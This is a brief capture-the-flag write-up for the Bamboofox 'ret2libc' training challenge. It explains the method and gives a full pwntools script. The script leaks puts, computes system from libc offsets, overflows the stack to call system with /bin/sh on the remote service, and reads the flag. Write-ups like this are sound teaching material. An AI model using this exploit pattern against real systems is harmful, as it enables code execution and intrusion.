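# Bamboofox/train/ret2libc [50]

###### tags: `CTF`,`PWN`,`Bamboofox`,`writeup`

Challenge file link: http://gofile.me/6lhQ2/HONujKdAa

This challenge is essentially a hands-on practice exercise.

The idea is to obtain the address of `puts`, derive the address of `system` from it, and then overwrite the return address with it.

```
# -*- coding: UTF-8 -*-
from pwn import *

context.arch = 'i386'

local = False
debug = False
gdb1 = False

# libc provided with the challenge, used to look up symbol offsets
elf1 = ELF("./libc.so.6")

if debug:
    context.log_level = "debug"

if local:
    r = process("./ret2libc")
    if gdb1:
        gdb.attach(r)
else:
    r = remote('bamboofox.cs.nctu.edu.tw', 11002)

# Read the address of puts that the service prints
r.recvuntil(b"puts\" is ")
binsh = 0x804a02c
puts = int(r.recv(10), 16)

# system = (puts - puts_offset) + system_offset, i.e. libc base plus offset
puts_offset = elf1.symbols['puts']
system_offset = elf1.symbols['system']
system = puts - puts_offset + system_offset

# 0x20 bytes of padding, then system as return address, a dummy return, and the argument
r.sendline(b"a" * 0x20 + p32(system) + p32(0) + p32(binsh))
r.sendline(b"cat /home/ctf/flag")
r.interactive()
```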